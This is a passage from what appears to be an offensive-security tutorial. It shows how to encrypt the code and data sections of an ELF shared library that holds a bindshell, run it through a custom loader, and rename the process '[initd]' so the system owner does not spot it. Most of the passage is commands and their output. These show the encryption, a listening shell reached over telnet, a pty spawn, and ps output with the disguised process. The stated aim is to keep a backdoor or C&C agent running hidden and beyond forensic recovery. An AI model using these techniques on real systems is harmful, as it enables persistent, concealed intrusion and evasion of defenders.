$ openssl rc4 -e -K 41414141414141414141414141414141 -in rodata_section.txt -out rodata_section.enc -nopad

$ dd if=./rodata_section.enc of=./testalo_bindshell_mod.so seek=2805 bs=1 count=193 conv=notrunc

Then the launcher is executed. It takes the bindshell module filename (now both with encrypted “.text” and “.rodata” sections) as a parameter:

$ ./golden_frieza_launcher_v2 ./testalo_bindshell_mod.so

The “.text” section offset and length is passed as hex values (we have already seen how to get those):

Enter .text offset and len in hex (0xXX): 0x6ca 0x41f
Offset is 1738 bytes
Len is 1055 bytes

Next the “.rodata” section offset and length is passed too as hex values. As seen in the last “readelf” screenshot above, in this case the section starts at 0xaf5 and the len is calculated like this: 0xbb50xaf5 + 1 = 0xc1:

Enter .rodata offset and len in hex (0xXX): 0xaf5 0xc1
.rodata offset is 2805 bytes
.rodata len is 193 bytes

Then the launcher asks for a command line parameter. Indeed our bindshell module (specifically the exported  “testalo()” function) takes as an input parameter the TCP port it has to listen to. We choose 9000 for this example:

Enter cmdline: 9000
Cmdline is: 9000

The encryption key (“AAAAAAAAAAAAAAAA”) is now inserted without being echoed back:

Enter key:

The final part of the output is:

PID is: 3915
Module name is: testalo_bindshell_mod.so
7f5d0942f000-7f5d09430000 r-xp 00000000 fd:01 7602214 /tmp/testalo_bindshell_mod.so
Start address is: 0x7f5d0942f000
End address is 0x7f5d09430000

Execution of .text
==================

This time below the “Execution of .text” message we get nothing. This is due to the behavior of our bindshell that does not print anything to the standard output. However, the bindshell backdoor has been launched properly in the background:

$ netstat -an | grep 9000
tcp 0 0 0.0.0.0:9000 0.0.0.0:* LISTEN

$ telnet localhost 9000
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
python -c 'import pty; pty.spawn("/bin/sh")'
$ id
uid=1000(cippalippa) gid=1000(cippalippa_group)

Last old-school trick of the day

A valuable point is: how is the process shown in the process list after the bindshell backdoor is executed?

$ ps -wuax
[...]
./golden_frieza_launcher_v2 ./testalo_bindshell_mod.so
[...]

Unfortunately the system owner could identify the process as malicious on first glance! This is not normally an issue in case our code runs for a narrowed amount of time. But what in case we want to plant a backdoor or C&C agent for a longer period of time? In that case it would be convenient to mask the process somehow. It is exactly what the piece of code below (implemented in complete form here) does.

Let’s first compile the new version of the launcher binary:

$ gcc golden_frieza_launcher_v3.c -o golden_frieza_launcher_v3 -ldl

This time the launcher takes an additional parameter beyond the encrypted dynamic library filename, which is the name we want to assign to the process. In the example below “[initd]” is used:

$ ./golden_frieza_launcher_v3 ./testalo_bindshell_mod.so "[initd]"

Indeed by means of “netstat” we can spot the PID of the process (assuming the bindshell backdoor has started on TCP port 9876):

$ netstat -tupan | grep 9876
tcp 0 0 0.0.0.0:9876 0.0.0.0:* LISTEN 19087

…and from the PID the actual process name:

$ ps -wuax | grep init
user 19087 0.0 0.0 8648 112 pts/5 S 19:56 0:00 [initd]

Well you now know should never trust the ps output! 🙂

Conclusion

What if somebody discovers the launcher binary and the encrypted ELF dynamic library in the filesystem? The encryption key is not known hence nobody could decrypt and execute our payload.

What if the offset and length of encrypted sections are entered incorrectly? This will lead most of the cases to a segfault or illegal instruction and the consequent crash of the launcher component. Again, the code does not leak out.

Can this be done on Windows machine? Well, if you think about “LoadLibrary()”, “LoadModule()” and  “GetProcAddress()”, these functions API do the same as “dlopen()” and “dlsyms()”.

That’s all for today!

Snafuz, snafuz!